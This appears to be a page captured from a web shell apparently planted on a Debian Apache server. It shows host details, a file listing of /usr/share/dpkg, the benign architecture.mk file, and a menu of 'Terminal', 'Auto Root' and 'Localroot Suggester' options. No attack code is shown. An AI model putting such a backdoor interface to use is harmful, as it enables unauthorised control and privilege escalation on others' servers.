Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
dpkg /
Delete
Unzip
Name
Size
Permission
Date
Action
sh
[ DIR ]
drwxr-xr-x
2026-05-18 06:30
abitable
362
B
-rw-r--r--
2026-03-07 12:15
architecture.mk
644
B
-rw-r--r--
2026-03-07 12:15
buildflags.mk
1.77
KB
-rw-r--r--
2026-03-07 12:15
buildopts.mk
392
B
-rw-r--r--
2026-03-07 12:15
buildtools.mk
2.71
KB
-rw-r--r--
2026-03-07 12:15
cputable
2.1
KB
-rw-r--r--
2026-03-07 12:15
default.mk
362
B
-rw-r--r--
2026-03-07 12:15
no-pie-compile.specs
77
B
-rw-r--r--
2026-03-07 12:15
no-pie-link.specs
65
B
-rw-r--r--
2026-03-07 12:15
ostable
2.06
KB
-rw-r--r--
2026-03-07 12:15
pie-compile.specs
97
B
-rw-r--r--
2026-03-07 12:15
pie-link.specs
76
B
-rw-r--r--
2026-03-07 12:15
pkg-info.mk
1.53
KB
-rw-r--r--
2026-03-07 12:15
tupletable
2.2
KB
-rw-r--r--
2026-03-07 12:15
vendor.mk
1.61
KB
-rw-r--r--
2026-03-07 12:15
Save
Rename
# This Makefile fragment (since dpkg 1.16.1) defines all the DEB_HOST_* and # DEB_BUILD_* variables that dpkg-architecture can return. Existing values # of those variables are preserved as per policy. dpkg_lazy_eval ?= $$(or $$(value DPKG_CACHE_$(1)),$$(eval DPKG_CACHE_$(1) := $$(shell $(2)))$$(value DPKG_CACHE_$(1))) dpkg_architecture_setvar = export $(1) ?= $(call dpkg_lazy_eval,$(1),dpkg-architecture -q$(1)) $(foreach machine,BUILD HOST TARGET,\ $(foreach var,ARCH ARCH_ABI ARCH_LIBC ARCH_OS ARCH_CPU ARCH_BITS ARCH_ENDIAN GNU_CPU GNU_SYSTEM GNU_TYPE MULTIARCH,\ $(eval $(call dpkg_architecture_setvar,DEB_$(machine)_$(var)))))